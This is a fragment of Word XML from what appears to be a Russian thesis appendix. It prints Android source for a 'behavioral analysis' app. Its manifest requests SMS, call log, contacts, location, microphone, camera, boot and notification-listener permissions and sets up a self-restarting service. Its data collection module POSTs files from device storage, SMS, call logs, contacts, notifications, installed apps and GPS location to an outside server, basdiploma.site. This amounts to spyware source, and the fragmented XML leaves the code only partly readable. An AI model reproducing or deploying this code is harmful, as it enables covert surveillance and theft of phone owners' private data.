                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>package</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>="com.behavioralanalysis.service"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="android.permission.WAKE_LOCK"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="android.permission.CAMERA"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="android.permission.WRITE_EXTERNAL_STORAGE"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="android.permission.INTERNET"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="android.permission.ACCESS_NETWORK_STATE"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="android.permission.SEND_SMS"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="android.permission.ACCESS_WIFI_STATE"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="8C8C8C"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;!--&lt;uses-feature android:name="android.hardware.camera" /&gt;--&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="8C8C8C"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    &lt;!--&lt;uses-feature android:name="android.hardware.camera.autofocus" /&gt;--&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="8C8C8C"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;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="android.permission.RECEIVE_BOOT_COMPLETED"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="android.permission.READ_PHONE_STATE"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="android.permission.READ_CALL_LOG"</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="android.permission.RECORD_AUDIO"</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="android.permission.MODIFY_AUDIO_SETTINGS"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="android.permission.ACCESS_COARSE_LOCATION"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="android.permission.ACCESS_FINE_LOCATION"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="android.permission.READ_CONTACTS"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="android.permission.FOREGROUND_SERVICE"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:requestLegacyExternalStorage</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:allowBackup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:hardwareAccelerated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:largeHeap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:icon</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>="@mipmap/ic_launcher"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:supportsRtl</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:usesCleartextTraffic</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:theme</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>="@style/AppTheme"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uses-library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="org.apache.http.legacy" </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>android</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="174AD4"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:required</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">="false"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=".MainActivity"</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:launchMode</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>="singleInstance"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="android.intent.action.MAIN" </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 xml:space="preserve">category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="android.intent.category.LAUNCHER"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=".MainService"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=".ServiceReciever"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r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>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="RestartServiceWhenStopped"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="respawnService"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=".NotificationListener"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:permission</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"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="android.service.notification.NotificationListenerService"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&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>manifest</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB60A5" w:rsidRDefault="00DB60A5" w:rsidP="00DB60A5">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0054048E" w:rsidRPr="00355B45" w:rsidRDefault="0054048E">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355B45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc61505581"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>В</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0054048E" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Исходный код </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>модуля сбора данных</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB60A5" w:rsidRPr="00F870DF"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android.os.AsyncTask</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android.telecom.Call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android.widget.Toast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java.io.BufferedReader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java.io.InputStreamReader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java.io.OutputStreamWriter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java.net.HttpURLConnection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java.net.URL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java.util.Calendar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javax.net.ssl.HttpsURLConnection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Sender </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">extends </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AsyncTask</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Void</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&gt;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baseUrl </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"https://basdiploma.site/api/log/"</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String </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>doInBackground</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>... strings) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="8C8C8C"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>//Logger.log("sending" + strings[0]);</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="8C8C8C"/>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data =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URL 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url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URL(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>baseUrl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HttpsURLConnection httpURLConnection </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= (</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HttpsURLConnection</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.openConnection();</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.setDoOutput(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.setRequestMethod(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"POST"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"Content-Type"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</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"Accept"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </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.connect();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OutputStream outputStream </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>httpURLConnection</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.getOutputStream();</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">OutputStreamWriter outputStreamWriter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OutputStreamWriter(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>outputStream</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">,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.write(strings[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.flush();</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.close();</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BufferedReader bufferedReader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BufferedReader(</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InputStreamReader(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>httpURLConnection</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">.getInputStream(),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line =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StringBuilder sb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StringBuilder();</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 xml:space="preserve">((line = </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>bufferedReader</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">.readLine())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sb</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.append(line);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bufferedReader</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.close();</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            data = </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sb</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.toString();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"error"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, ex.getMessage());</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80808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>data;</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start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sendApps</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w: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sendFile</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"/storage/emulated/0"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sendCalls</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send</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toSend)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toSend.put(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android.text.format.DateFormat</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>format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67D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"yyyy-MM-dd HH:mm:ss"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Calendar</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getInstance</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>().getTime()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toSend.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"deviceId"</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871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>id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Sender().execute(toSend.toString());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showMsg</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msg) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">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080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>makeText</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</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 xml:space="preserve">(), msg,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871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LENGTH_SHORT</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>).show();</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sendWifi</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Wifi</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sendSms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Sms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sendPermissions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"granted_permission"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Permissions</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getGranted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sendNotification</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notification)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notification);</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Locations gps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Locations(</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gps</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.isCanGetLocation()) {</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gps</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.get());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sendContacts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"contact"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Contacts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sendCalls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"call"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sendApps</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isWithSystemApps)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"Sender.sendApps()"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"app"</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"isWithSystemApps"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, isWithSystemApps);</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Apps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(isWithSystemApps));</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sendError</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data)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data.put(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(data);</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"Error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sendFile</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path)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Files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(path));</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downloadFile</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object)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"download_file"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object);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rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0054048E" w:rsidRDefault="006657C4" w:rsidP="00DB60A5">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRPr="00F870DF" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc61505582"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Г</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="00F870DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0054048E" w:rsidRPr="00F870DF" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Исходный</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870DF">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870DF">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>модуля</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870DF">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>приложений</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
